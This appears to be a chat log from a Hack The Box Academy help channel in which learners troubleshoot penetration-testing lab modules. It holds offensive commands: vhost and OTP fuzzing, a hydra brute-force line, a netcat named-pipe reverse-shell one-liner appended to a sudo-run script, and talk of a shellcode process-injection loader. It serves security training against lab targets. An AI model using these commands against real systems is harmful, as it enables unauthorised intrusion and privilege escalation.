yeah i thought it wouldnt i just thought id try lol

you can put it in the same line

the target is a public_ip:port

so vpn won't change a thing

your system doesn't know how to route to the vhost.inlanefreight.htb:port

when i scanned for vhosts, it didnt yield any results.

tip: any time you find a vhost -- add it to /etc/hosts

your command is likely wrong

the command i used was: gobuster vhost -u http://inlanefreight.htb:58452 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

wrong list

alright thanks ill try some others

use one of the lists that was showcased multiple times in the module

you can also (safely) use 100 threads with gobuster without bricking the server/dropping connections

but subdomains-top1million- is the right set of lists

okay thanks Im pretty sure i used that before but ill try again!

it's one of the bigger lists

found it, thanks for the help. I looked before at my command history and when i ran the list the correct vhost was on I terminated the search when it was 98% done because i thought it was likely just not in that list and it would have appeared earlier lol. Duly noted, finish the scan

2 things delete bc spoiler

ok

And 2 replace :MYPORT with just literally :PORT

Alright deleted. Thanks

The answer field isn't that smart

😉

@fathom pendant you seem to know a lot! If you don't mind a personal question, are you working on a path(s) in HTB or do you just mod here?

I'm not a mod

I just spend time helping

oh, i see

are you on a path in the academy?

Yes

Been busy with life so priorities shift

Attacking Common Services - Easy Lab

got the webshell and successfully uploaded a reverse shell. im listening and executing the shell with "shell.exe" in the webshell, but i don't catch anything from nc. the webshell doesn't do any commands other than whoami and downloading from the http server.

i assume i'm on the right path with the reverse shell, but don't see any other option

I mean... why not use the webshell to find and read the file, no revshell needed

Also, is the target windows?

I genuinely forget

If it is; then use windows commands to find files

It's likely that there's Outbound rules preventing the revshell connection

This isn't the channel to ask about boxes

This channel is for academy modules

Mb 👌

that what i thought. yes it's windows. i tried earlier forfiles and dir which i didn't get anything from. somehow for /d %d in ("C:\Users\*") do dir /s /b "%d\flag.txt" worked ✅

Probs worth noting that if they are asking for admin flag its almost always on the admins desktop

For loops don't work too well in webshells

Because default env is cmd

s

This isn't the place to broadcast you need help

Module: Attacking Common Services
Chapter: Attacking Tomcat

• in the chapter, we're given 2 options to brute force Tomcat, a msf module and a python script
• but since it's a simple http basic auth login, why don't we use hydra instead, isn't it more straightforward than a python script?
  hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local -m /manager/html http-get -u -s 8180

yeah you can

I'm trying to follow the logic behind using a python script when you can use hydra. I can understand a python script alternative to a msf module (for OSCP or customization needs), but not really for a Basic Auth with hydra

it's just to show different ways you can do things, with some modifications you can make the script work with post forms

sorry

Fair enough, the course does talk about scripting after that

If I reset a lab does it reset for everyone else?

No

Modules labs are completely independent

Hey, so I’m on the ARP spoofing and abnormality detection lab. I uploaded the resource for Wireshark and read through the lab instructions. The question asks me to submit the total count of ARP requests, and it’s showing 1, but the number at the bottom of Wireshark says 42. I ran the command (eth.src == 08:00:27:53:0c:ba && arp.opcode==1). Am I doing something wrong?

https://academy.hackthebox.com/module/54/section/502

Attacking Web Applications with Ffuf - Filtering section

I have added the target to /etc/hosts as academy.htb, then run the filtering scan to filter with VHosts (with a size greater than 900 to filter out empty pages), but I'm getting back hits on every name in the wordlist.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs 900

The question for the section is asking for 'what other VHosts do you get' ... I get all of them ....

then you'll need to adjust the filter

almost all the pages were 986 in size. made the filter that ....

-fs 900 filters out results exactly 900 bytes only

yes

thought it was only showing results above 900, and i was expecting to find the 1 i needed being larger than 900 ...

you won't know the right size until you get a hit, so filter by the size you don't want to see

that info is very helpful on the next one for para fuzzing lol

yea just tried that with para fuzzing and it worked a treat.

any one done the intro to assembly language module? Need help with the exercise in the section "Debugging with GDB" can pm me about this

what do you need help with

Can anyone guide me on how I can type the commands to get the answers for the following questions:

1. What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

2)How many files exist on the system that have the ".bak" extension?

3)Submit the full path of the "xxd" binary.

what os is it?

It's linux

It's from the linux fundamentals module, this section gives example commands and explanations

Correct, but I am struggling with this part as I don't quite know what I can type to get the information needed

Look at the example find command

I believe this section or another contains a list of common commands

If you're unsure you can always either do <command> --help or man <command> to read how to use it

post screenshots

Gotcha okay

what os is correct?

His account isn't linked, can't post screenshots here

Brother. This is linux

You have to have the drive and curiosity to be able to succeed,

Way ahead of you on that one, also like seeing what others have found that I may have not thought of

It's literally just reading the manual

Cool ill circle back to it and if I have more question I post it here

You'll run into that a fair bit in this field

The example command from this section pretty much gives you the answer to 1

which is another command that can help with 3

And find can also be used for 2

Perfect thank you @fathom pendant

Note config files are usually named; .conf, .cfg, or .config

Gotcha, good to know

need a hint for file upload attacks module im on the skills assessment trying to fuzz for extensions but the wordlist in the module isnt proving useful

https://academy.hackthebox.com/achievement/1346583/54

Hello!
I'm on this module / section https://academy.hackthebox.com/module/77/section/859 and I'm having trouble putting in what I should put as the 'TARGETURI' with metasploit. I know what exploit to use and why. I hope somoene can help me.

Need help - I'm using browser based instance to complete the module chapter SMTP. For the last Q, I need to find the system username by enumeration. Upon multiple tries with different username wordlists, did not succeed. So took a hint and it says, I need to use the provided wordlist i.e Footprinting-wordlist. But I cannot find this wordlist in the browser instance. Tried find / -type f -iname "Footprint-Wordlist*" 2>/dev/null no result. Can someone please tell me where can I find this wordlist stored on the instance? Thank you in advance. And sorry if I overlooked/missed something or its silly. 🙃

put the target url, there are examples given

what module

https://academy.hackthebox.com/module/112/section/1072

it's in the resources button, scroll up

yes, where to find in the browser instance?

you don't, transfer it over

oh okay, on it

oh nvm i got it bruh

Done, thank you!

You don't need to change that variable

yup dw i got it down now

man im proud i did this 🤣

Gj :)

It doesn't get easier

yeah l0l i. tried to put like an empty space but it didnt work

so i was like how do i put 'nothing' so to say but its all figured now! 😄

im trying to get a privesc script to the target box but when i do the command it wont even start lol

from my own box*

this is more of like an error thing:

it should be like that but now when i do it:

like ive done it b4 idk why it wont work now

the server is running

wot? it told me to wait for the 200 code as that means its running

oh no wait

sorry l0l its when scirpt is installed it says 200 mbbbbbb

it will only show if something send a request to it

im looking at the modules that shows ways of transferring files i think i got it now

The example shows the successful request to the running web server

Also you don't need sudo to run it on 8080

Any port > 1024 doesn't require sudo

i tried wget anyway it didnt work so its ok but yeah i was writing sudo cause the module also did sudo

when i learnt about the http seerver

When dealing with alternate ports you need to specify the port in the request

yea idk why module shows sudo for port 8080, not required

i did

wget http://[your_tun0]:port/[file]

but the target doesnt have wget

Is it linux?

If so it should

maybe it's a container

They can't access the internet

hmmm

some containers don't have wget

i did this and it didnt work

"Didn't work" what error?

Sudo is required for 8080 bro

as that was the thing i learnt earlier so i was like ok ill just use that

Did you get the request in your running http server?

Oh

I can't start a python server on 8080 without sudo

nope

You need to drop into a shell

is 8080 special or something

You're trying to run it from the meterpreter console

Idk

Type shell first

oh from /bin/sh?

No

i guess since reverse proxies tend to use 8080 it may have significance

You're not in an interactive session in msfconsole

Ye

You need to drop into the shell

At least in my laptop, running anything on 8080 requires sudo

help me. 🤣

i was doing arroe key left and right

and i fucked it

python3 -c "import pty; pty.spawn('/bin/bash')"

You didn't fuck anything up

huh what distro are you using that you need sudo for 8080

It's just not a full shell

im very confused rn

Ctrl + l will unfuck everything for u

I'm telling you how to get a more interactive shell

not familiar territory

Debain

This is a command you need to know very well

that is definitely not normal

smths not right... i did ctrl + l nothing happened

¯_(ツ)_/¯

I was able to run it without sudo on my ParrotOS box

Oh

Do /bin/sh instead of /bin/bash then

ive never heard of python3 -c "import pty; pty.spawn('/bin/bash')" i dont think im supposed to do that yet

It's how you upgrade shells

That just gives you a stable shell

that's just to upgrade your TTY to something more familiar-looking

and also add some functionality

oh okay sorry lads man my head

What you're seeing the [[A^ is the literal key interpretation of the arrow keys

still stuck

shit ss ik xD

I said /bin/sh

oh l0l

Not /bin/bin

Lol

fuck it, run the bin binary

No such file or directory

Type exit a few times to get out of it then

uh, maybe exit and spawn another shell

which python

https://tenor.com/view/butters-were-all-fucked-south-park-gif-11674796

Most targets have python3

sudo mkdir bin/bin

https://tenor.com/view/byuntear-baby-cry-crying-gif-25019897

Calm down

Lol

Run the /bin/sh python command again

What exactly are you trying to do now?

it's just like the evil-winrm shell i broke after running a powerview cmdlet

Upgrade shell

get out of that shit so i get to my normal looking terminal

From a meterpreter paylpad

you can Ctrl+C, it'll ask if you want to terminate channel, press Y, then enter shell again at meterpreter prompt

The exploits won't always give you a clean looking shell

fuck it ill reconnect to it with the exploit

oh

Just copy the command @fathom pendant gave you word by word

l0l ty

im back

i thought it would exit me out completely thats why i didnt do it

just to make sure it works, type whoami after dropping into shell

Now drop back into the shell with shell

i wrote abit fast so they overlapped but they are seperate trust

Ok it's working

You don't need to write "shell" in the session btw

oh

You only need to write it from the msfconsole part

cool

Ok

you can upgrade TTY now

Now

Doesn't msfconsole give you an upgraded shell automatically?

Not always

Oh

It depends on the payload/exploit

okay now: python3 -c "import pty; pty.spawn('/bin/bash')" ?

or sh

/bin/sh

/bin/bash would probably work

there u goooooooooo

mrb3n sounds like a regular user

The error was saying /bin/sh

ok now what i was actually here for

Now you can move forward with wget

damn bro no bash

u said wget should be on it

ok it is ty!!!!

Error: Source: User

ok permission denied

ig ill try curl

cd to a dir you can write to

tru lemme check

/tmp/ is world writable

Are they trying to import something to the target VM?

im trying to import a PrivEsc script into the target VM, rn the LinEnum.sh

Oh ok

That's not a privesc script

It's an enumeration script

Sorry yeah but it will allow for a PrivEsc if it finds anything

Mb wasnt that precise i still gotta figure out all these words hehe

it will give you something to look into for your privesc

(sudo -l would get you some info faster btw)

you will also need to reference gtfobins

https://gtfobins.github.io/

this. it's mentioned early in the path but i forgot about it, but so many of the exploits are done using info provided on this amazing resource. its now a go-to

Oh? I don’t recall it at all tf

I even take notes for important stuff like that

yea, if, for example, yuo can run ||php|| as sudo, if you go to that website you will see commands that will help you use that to privesc. or similarly, if you can run vim without a password for sudo then check the site, it'll show you how to then get root

there's a windows version too, btw

lolbins

https://lolbas-project.github.io/ mb lolbas

Living Off the Land Binaries and Scripts

i think the thing I like a lot about LOLBAS is they also link to the related MITRE ATT&CK framework

definitely a great resource

Hi, can someone please help me with Attacking Common Services - Hard --- I cannot seem to be able to download anything from SMB 😦

make sure you are in a writable directory like /tmp/

omg thank you!

https://academy.hackthebox.com/achievement/1346583/57

pretty cool skills assessment tbh

having a problem with this question

1. Ensure you're in the directory
2. Use the get command. Usage: "get filename.extension"

Oh you've answered it, nice

Module: Footprinting
Section: SMB
<-- would be sick if i got some help with this, not sure what im doing wrong

brother

you need to use the module name and section name

the endpoint isn't helpful at all

o shit okay

sorted

what is the customized version, usually it's samba smb but this isn't, use what you know to find the version

the answer is the full name including vX.X

it's asking about the network share you found, so --- get info about it 😉

at pivoting,i really have problem to this quest Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) .I can't work the autoroute,because i can't find a session.And i follow the steps

anyone can help me?or atleast give me a hint?i can't find the session to run autoroute

to find your active sessions, in msfconsole you type "sessions"

then "sessions 2" to select the second one.

yes,but its like i dont have a session

while i follow the steps,have a meterpreter,then setup proxy server inside msfconsole,i mean i dont know why it isn't working

do you have to background the session, then run the autoroute ?

if you background the session, then you'll have a session to choose. if you have no session to choose, then you're not in a shell to begin with

i have 2 terminals,1 with the revshell,and another with msfconsole in my attack host.I setup the proxychains inside msfconsole

something i am doing wrong/missing something

i think i just fixed it

awesome

i plan to circle back to that, but i'm going to try using ligolo-ng

yeah i saw a video about ligolo-ng but i am still behind.I found the 2 subnets,but now the answer is not correct

good job finding them. pivoting through and all the listeners/proxy's gets confusing

i need a nudge every now and then with that one

can i dm you one sec

yes

I suppose dictionary attacking w/ hydra or msf is not expected in the medium or hard footprinting lab right..?

only to the extent of whatever is taught

but the only thing i'll tell you: as long as you properly enumerate you'll be on the right path

https://cdn.discordapp.com/attachments/248522601956245504/1259465840068395129/image.png?ex=668bc878&is=668a76f8&hm=ede63892ec5b199195787a78b12fcbe37c2e18babaf1f74d747253f0b81b462c&

took me a while but had very little time to spend on password module past 2 months

maybe 3 hours per week if lucky

Hi ya, I’m having issues with windows evasion module, process injection section. it seems like the payload is not being executed

I am also stuck in same challenge. Can you nude me ..

ayee gz! progress is progress

Module : Footprinting
Section : MSSQL
Question : Connect to the MSSQL instance running on the target using the account (backdoor:Password1), then list the non-default database present on the server.

What am I not doing right ? 🤔
Any hint ?

BROKEN AUTHENTICATION

Attacking Session Tokens

theres one word

Broken Authentication, the OTP Part in the skill assesment can someonehelp me out

if i solved the skill i told you 😂

read the example carefully

i was able to follow what the excerise wanted me to do and get code execution

but when i try to access thee home directory i get this eerror

Hi everyone, Who knows why, with the same scan as in the lab, my bind version does not show?

Thanks sir !

i told you use burpsuite and what you learned in command injection to bypass space character

this is one of the few instances where you need to use pwnbox

can i Dm you for some help ?

ok

Thanks, it helped

help me with the broken authentication skill assesment otp part

Hello again,
I now have Target VM access with a path that doesnt require sudo password. I need to make a NC that waits for connection to my local vm with root access. I don't know what to do. I tried to apply what I learnt before, but it's a bit different.

explain more on what you need to do and what you tried to do

also module and section

https://academy.hackthebox.com/module/77/section/859

And script has discovered or sudo -l

From the previous section once I had this the sudo pwnage, I used this:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

sudo /home/nibbler/personal/stuff/monitor.sh

and then:
on my local vm: nc -lvnp 8443 to catch root shell

I saw the pattern repeating, so I figured I'd do somewhat the same:

So I wrote:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <w.e my tun0 is> 8443 >/tmp/f' | tee -a /usr/bin/php

is that wrong? I figured this is where I went wrong

yes, previously monitor.sh is a script that you can write to, now php is a program you can run with sudo, but you don't have write permission to it

right

consult https://gtfobins.github.io/ and check the sudo section

will do, thank you Xre0Us I appreciate it

bruh yeah marcilee told me too i forgot but that was yday just woke up

hey guys, need help. I'm trying to complete the last Q from this module https://academy.hackthebox.com/module/112/section/1238 from browser based instance. but the instance does not have mysql tool. Tried installing from apt and manually via downloading the deb package but it is unsuccessful. Please tell me if I'm missing anything

#710108839063846964 message

let me give it a try 🙂

How can I get more cubes? I only have 30 cubes and I need 20 for the next module? aka the nmap enumeration module.

Prob go for subscriptions

I would need to be on subscription? I'm a high school student, I would assume that wouldn't go under your lists of "student" ?

student subscriptions are available

it's $8 a month

worked like a charm, thanks for sharing!

Module: Footprinting
Medium Lab
Question: Am I supposed to extract the mssql db file exactly with the previously obtained credentials of sa and alex via smbclient? I didn't saw 1433/TCP open from nmap. Or is there anyways to interact inside out via smbclient or rpcclient?

https://academy.hackthebox.com/achievement/910766/80
i was so dumb nvm

try other protocols like rdp

I figured out what it was, i was really dumb about it.

I always forgot about this and winrm

I forgot to let you know about it

A session token can be brute-forced if it lacks sufficient what? This answer it’s not correct A weak cryptographic algorithm . Anyone can help me please # broken authentication

why

Hey again, someone please help me with this issue (stuck since last 15mins) #starting-point message

module - https://academy.hackthebox.com/module/112/section/1246

Broken Authentication, Authentication Bypass via Parameter Modification
can someone help me?

I tried burp intruder with the worditst 0 to 1000 but is not seem like the right path

tried ffuf|| ffuf -w /usr/share/seclists/Fuzzing/3-digits-000-999.txt -u "http://94.237.53.113:51211/admin.php?user_id=FUZZ" -fr “Could not load admin data. Please check your privileges.” -fs 14484||

next time just paste the issue here but try reinstalling

pip uninstall impacket
pipx uninstall impacket
pipx install impacket

forget about it

I found it

-fr make no sense here

and run it without python3, just mssqlclient.py

tried this as well. No luck. There seems to be a new one that might not be discussed earlier (or maybe I missed that message while searching)

follow what I sent, don't install with pip

it worked 🤯

there's some python env issues with the current pwnbox image, pipx would handle it for you

@safe yoke dm please

Nice, thank you again!

BROKEN AUTHENTICATION
Skills Assessment

ffuf -w 4_token.txt -u http://94.237.49.212:34777/2fa.php -X POST -d "otp=FUZZ" -fr "Invalid OTP." -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=batl5885t858e6l4ssvomnf1b8"
it doesnt work why ?

Hello guys, Im in the module ATTACKING ENTERPRISE NETWORKS in the web enumeration & Exploitation part on question 2. No matter what I upload, I always get "JPG, JPEG, PNG & GIF files are allowed." even if to test, I upload a real jpg or png or any other file. Following exactly what the solution says also doesnt work for some reason

worked. Issue with the machine, restart fixed it

@next bronze Hi ya, sorry for pinging, do you mind if I DM for help in Windows Defender "Process Injection" ?

I didn't do that module. I have implemented it in C but not C#, but the process should be similar, what are you having problems with

The process injection is crashing the process I want to inject to (eg. notepad.exe). I'm simply doing creating process, alloc memory RW, write shell code, set memory to RX and create remote thread. The crash point is at creating remote thread

have it print out the error using GetLastError https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror and debug from the outout
also make sure your target compile is the right architecture and build

I think it crashes in the notepad.txt process so I would need x64dbg it instead

yeah that works too

also iirc it's notepad.exe on windows 10 and Notepad.exe on win 11

no one answer @everyone

ah apparently notepad.exe is 32bit so it crashes when I try to run 64bit shell code lol

I've been having connectivity issues with pwnbox the past couple days. While I first start working on an exercise I start pinging the target IP but eventually the pings stop going through. If I wait long enough with the ping command still running, eventually the pings will start getting through again and I can proceed with the exercise. I've tried reverting/resetting the target but it doesn't prevent it from happening again.

have you reached out to support

No I have not. Is this how I do it?

correct

Ok I will. Thank you.

DM!

ah ok, the notepad in SysWOW64 should be 64 bit

Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I'm using ffuf and zaproxy and I was fuzzing http://inlanefreight.htb:port/FUZZ url with these seclist wordlist: common.txt, big.txt, directory-list-2.3-medium.txt, raft-* etc but with no luck. I did the same for subdomain and hidden admin directory.
What am I missing? Can someone share a hint?

I am stuck from one day know .

sorry for the delay i dropped a message

Working on the Attacking Common ApplicationsSkills Assessment II, fuzzing for vhosts. Any idea why I"m getting nothing but 'Status: 400' results back using GoBuster? Ffuf works just fine, just wondering if there's any issue with my GoBuster commmand or if I should consider uninstall/reinstall?

@inland nymph I didn't give permission to dm

I'm now trying to inject to 64bit notepad, and for some reason it returns no thread ID from creating remote thread. I checked GetLastError but got 0

No crashing anymore tho

but does the shellcode run? you can use x64dbg or process hacker to see the threads in a process

no, it didn't run, I have added breakpoint on where the shellcode is but got nothing

no threads have been created

print out the address of lpBaseAddress and examine in the debugger

add breakpoints after each operation

Did that but it didn't trigger the breakpoint

you can add a pause within your progream itself

I meant the breakpoint in x64dbg for notepad.exe

for the visual studio code, I have stepped into each operation until CreateRemoteThread

@dense ferry Do you mind giving a hand on "Process Injection" for Windows Evasion, as the example isn't enough to get the task done, and been running to weird issues

yeah so is it being written into the allocated memory?

yup it has, the shellcode has been written to lpBaseAddress, the permission is also correct (RX)

I don't have access to my dev vm now so I can't test it, but the code is fairly standard for process injection, no reason why it shouldn't work

maybe try other programs?

the funny part is that if I pause the notepad.exe and move the RIP to where the shellcode is, it actually works

so I just don't get why createRemoteThread doesn't return a thread ID, meaning failed to create one, while calling GetLastError() returns 0 as well

that is very strange

is your project settings correct? x64 release mode

yea, i just found out that visual studio by default setup "Any CPU" config which is 32bit....

sorry for bothering with you coz of this

ah okay at least it works now

Seems like binary in ProcessInjection doesn't get triggered

I generally don't recommend random pinging staff (even if they're the module author)

so do I post issue in erratum channel ?

Only if you believe it to be an error in content, and not you misunderstanding/not reading thoroughly

everything. I have near to 0 knowledge on assembly language I'm setting my break point at _start function and stepping but ya programs terminating at 13 address so cant get to the 16 to analyze it.

this might be an issue with hex vs dec

i believe the debugger defaults to hex

whereas you're trying to step in dec

16 from hex --> dec = 21 iirc

16 in dec to hex is 10

INTRODUCTION TO DIGITAL FORENSICS
Evidence Acquisition Techniques & Tools
Visit the URL "https://127.0.0.1:8889/app/index.html#/search/all" and log in using the credentials: admin/password. After logging in, click on the circular symbol adjacent to "Client ID". Subsequently, select the displayed "Client ID" and click on "Collected". Initiate a new collection and gather artifacts labeled as "Windows.KapeFiles.Targets" using the _SANS_Triage configuration. Lastly, examine the collected artifacts and enter the name of the scheduled task that begins with 'A' and concludes with 'g' as your answer.

are in the screenshot the right artifacts?

https://academy.hackthebox.com/module/144/section/1255

Trying to grasp the concept of zone transfers. In this screenshot, is nsztm1.digi.ninja one of the Name Servers, while zonetransfer.me is the domain?

that's right

dig <type> @nameserver domain/website

the nameserver part can be an IP not just a FQDN

also as a note; remember you're seeing records relative to the server you query

so a record that's 127.0.0.1 on the query means it exists on the same host

When I attempt to retrieve the NS for inlanefreight.htb, there are no results.

Is the NS meant to be the generated target?

I ran the command ||$dig NS inlanefreight.htb|| btw

I think you forgot your nameserver

somebody online who knows this?

how do I switch the mode if that is the issue?

I though that is what the command is supposed to be searching for/retrieving

you still need to give at an IP to search from

otherwise it defaults to public nameservers

And that would be the one generated for the question?

the dig command is like: dig (for the records) NS TXT A AAAA ... (related to this) domain @ dns server ip address (whatever ip address is used as a dns server). So it is a bit like searching for a file in a folder in a building.

but i don't know if it is clear for other readers...

Okay

So it should be formatted more like ||$dig NS inlanefreight.htb @generated_ip_adress||

or am i misunderstaind the name server

yeah if you look for the name server record that's what you can use

but you'll get results only if a DNS server is in use.

I think i found my issue 😭

I need to be on a vpn dont i

i dont know what you got. Generally if you have an IP:PORT that's not necessary, but if you have IP:PORT, that's most likely a virtual host

yes

this question uses a private ip 10.129.x.x

So i need to use the academy nameserver in order to retrieve the NS for inlanefreight.htb

then I use that NS to axfr request

i was checking the course and they say:
You can use the dig command to request a zone transfer:
$ dig axfr @nsztm1.digi.ninja zonetransfer.me

You use the generated ip

A zone transfer will also yield a NS record

And the A records

yeah it will drop everything

Okay got it

In short @rustic sage use the generated ip in place of the nameserver

Now i have to either count the records or find a flag to do it for me

Yeah

Ok thanks guys

For the a records question I suggest using regex to filter the A record lines

Don't forget about other possible zones (subdomains)

I just shortened it and counted it

I mean wc -l is helpful

Alongside grep

so I just tested it, you can inject x64 payload into notepad at system32, if the OS is 64 bit, the program will run at 64 bit, that's why I didn't ask you to check the process type to begin with. so I'm not sure where is going wrong there because I've tested the code in the module and it works with minimal modifications

it doesn't get triggered likely because your program is running the wrong calc exe

also some screenshots or commands you've used would help

b _start (to set break point)

si (to step)

tried setting breakpoint after the point where program terminates and using

"jump" command though this doesnt work program still crashes.

Can you do _start + 10?

If your gdb is in hex that'll jump it the 16 steps

1-9A-F = 1-15

Can someone explain me,what is the "user's secret key" in this : TGT Issue: The KDC verifies the user's identity (usually through a password hash) and issues a TGT encrypted with the user's secret key. The TGT is valid for a specific period and allows the user to request service tickets without needing to re-authenticate.

maybe the user's secret key is the password hash...?because i can't think anything else

seems no says is undenfined when I tried to jump to that Though heres a screen shot program seems to go down after the 401013

It's a mix of things

Yeah, it's in hex

you breaking at the start then si and stop at the right place is all you need

mix means.. ?

10 in hex is 16 in base10

It means it's a mix of hash, timestamp, machine info

https://www.ibm.com/docs/en/zos/2.4.0?topic=kerberos-basics

i got it,i meant mix of what.Ok thanks for the help ❤️

ok

https://www.hypr.com/security-encyclopedia/ticket-granting-tickets

Additional documentation for you @worn matrix

so the question giving me in decimal but the debugger is in hex got it

As I said earlier lol

Lol Im serious when I say in this area of debugging and assembly language im complete freaking noob. This is totally new paradigm for me. Havent messed around with stuff like this at all.

I even broke down what was happening

Going + 16 in hex was going + 22 in dec

Which is outside range, hence the fault

The question wants you to go + 16 in Dec, which is +10 in hex

tbh using hex is the way to go, in any debugger when you see memory address is always in hex

it's also cleaner since every step is 8 bytes

clean clean

ya I got it now thanks for explaining that.

Once you deal with it enough your brain will know how it goes

Just remember the powerfall
From l-r, you take the number of digits and do [16^(n-1) * x, 16^(n-2) * y....] where x is the digit in that place. And you repeat including when n-z is 0 (to represent the first digit place). This works in any base system

1054 in decimal can be represented as
[10^(4-1) * 1 + 10^(4-2) * 0 + 10^(4-3) * 5 + 10^(4-4) * 4]

If you want another way to think about it, count the places right to left and do n-1 where n is the place

hello i need help

can someone help me plisss

in htb windows priv module ' Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.

i did the exploit and i was member of the admin group but i cant cd to admin user to get the flag i also tried change ownerchip of file and change permisions but i get permision denied

close and reopen the terminal

bruh

thx for the help

it did not help

update group policy and relog

Ive been searching everywhere and trying everything to figure out why the $rax answer im getting isnt working on the Intro to Assembly GDB module. ive set the break at _start+16 and it keeps telling me cannot access memory at address 0xffffffffffffffda. if anyone is able to give a push in the right direction I would be forever grateful.

hi whatsup

are you opening the right file

also #welcome so that you can post images

Im I’m the password attacks module. Pass the ticket section. The creds provided for the lab aren’t allowing me to RDP. Has anyone else had this issue

I downloaded the gdb.zip and did the wget and source to get it to gef and i was using the disasm file from the previous section since gdb doesnt allow you to 'gdb -q gdb' if disasm isnt the right file what file should i be using?

why can you not run gdb -q gdb

when i tried it before and used 'r' it gave me an error but i just tried it again and it worked. thank you ❤️

Is mysql installed by default on pwnbox? I tried to run it and command wasn't found. Looking for the binary now...

Don't think the labs allow internet access. I switched over the VPN instead but ty!!

doesn't look like the target is right or you're connected to vpn

anyone having issues sending SQLi in the spawned targets? they constantly time out, but i know they're the right commands

nvm, using pwnbox. works far far better

Yeah there's probably something wrong with your network connection

if it's timing out it's some connection issue

i connect to the webpage where you input search terms. normal terms execute properly, but once SQL commands go in, it starts timing out.

but the same commands copied into the pwnbox on the same site execute perfectly

So you're saying it's timing out when you try sql payloads on the webpapp?

yes

but same commands go through when using pwnbox

Pwnbox web browser?

yes

is it connected to the vpn? and you shouldn't use pwnbox and vpn at the same time

Do you get a successful injection when using the payloads in pwnbox?

yes, i am connected. if i wasn't, i wouldnt be able to load the initial page

yes

I just spanwed one and it works over vpn

yea, understood. its not advised, but its also the only thing that got it to work.

I mean you either use one or the other but not both

I say disconnect from the VPN, download another VPN ( TCP) and try again

yea ill try that in a minute.

Can you ping the machine and check the packet loss?

I'm using US4

https://gist.github.com/Xre0uS/2105986d23719cf99c271842528f48a6

Altho it doesn't show the packet loss, the connection seems okay from the ping tbh

the pwnbox connection seems fine

Should be fine

you can safely use 48 threads

new vpn connection (now on eu5 instead of eu4), with tcp, and same issues. it doesn't make any sense for a connection anyway. ive connected to the website thats susceptible to SQLi, and SQL commands are executed on the targets db, not on my computer....

very frustrating

just a wild guess but do you have 3rd party AV that's blocking the sqli requests

that could be it, but i only use windows defender

nah defender doesn't block it

you might just have poopy connection

earlier parts of the module i was able to execute commands. and in the skills assessment, i got my first inject in. so its just so very strange

yea could be. i just hope that during the exam it wont be an issue lol

this was literally discussed earlier

gdb in hex, where the instructions they want you to jump to are in dec

just convert dec --> hex

16 in dec is 10 in hex

16 is normal decimal but the debugger running in hex and 16 is 10 in hex. You actually need to run to 10 address in the code and not to 16

after to stepping to 10 read the the hex value in rax above

i also suggest not using the integrated terminal

it's very buggy and sometimes 'freezes'

use the in-browser vm in fullscreen mode

if you can't run your own vm*

Hi all

im stuck here

AD module
Privlege Access last question

Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

I write the correct commands but first it says connection successful then connection failed

you may be overthinking it; just connect to the mssqlclient and use xp_cmdshell

https://academy.hackthebox.com/achievement/1346583/33

crooooosin

I’m doing the Knowledge Check in the Getting Started part of CPTS path. I understand the exploit needed to establish a reverse shell, but when I use Netcat, I’m not getting anything in my terminal even though the PHP input I included has the same port specified.

learned a lot and got more comfortable with using sql!

does it have the right IP?

you also need to be running the nc command before you load the php page 😉

Does the syntax take the IP of the Pwnbox or the target machine?

why would you ask it to connect to itself?

I'm so confused, I can't connect via sqlclient either, it gives an error.

I wouldn’t unless the only other option wasn’t working either, lol.

are you using the provided parrot host?

yes

then you're likely missing something

so you have access to the internal network? 172.16.x.x on one of the interfaces?

no just access machine host 10.129.xxx

what's the error

It doesn't give any output but it takes too long

and powershell output

try with mssqlclient on the internal parrot host

there's a Privlege Access section in the AD module?

yes

yes https://academy.hackthebox.com/module/143/section/1275

it's privileged access

but i chalk that up to slight language barrier

it's for MSSQL, RDP, WinRM

crtl f has failed me

my brother in christ

you are not listening

???

Try a different browser

you are using the pwnbox

NOT the parrot host that's sitting on the internal network of the AD environment

dude... did you really forget this section?

SQL host is on the internal network

he can't access it via the pwnbox (directly)

yeah I know, I meant you've already asked them to check

yeah

Or clear the browser cache and retry

and now with this screenshot it confirms, he's thinking i'm referring to the pwnbox, which i'm not

there's teh EA-ATTACK-01 host (or whatever its called

yes yes i know you say de use ssh attack machine

when i try the ssh i have output permission denied for htb-student

or damundsen

so .... tried other browsers. private sessions too. still nothing. then wondered if its my ISP or similar, so I turned on Anon Surfer ..... and it worked.

did you even use the right password for htb-student

oh my god

Ohh

thanks for the suggestion. was directly the issue but sparked another potential problem!

What was that?

filtering through probably my ISP

Ye

otherwise, the AnonSurf wouldnt have fixed the issue

i normally run my VPN but had to tunnel it while doing the modules. was getting too much lag otherwise.

Ye ik I thought you had another issue lol

oh, and just realised ... AnonSurf runs you through tor ...

Yeah it does

just went through it myself and it's working as intended

I appreciate you checking. I’m still stumped in the same spot though. It has to be a syntax issue.

what's your command? (you can delete after)

One second. I’ll copy it from my laptop.

might be missing -windows-auth

and you replaced the 10.10.15.190 with YOUR tun0 address

i looked at something else woops

there's also a simpler way @rustic sage with the exec function

Is there a space between the ? and the php in your actual command too?

also yea as Candy said that extra space does actually matter

No. I had it without the space in the actual command.

Idk why I edited that. My brain is fried.

well I just ran your command on my spawned instance and itworks

Try other payloads ig

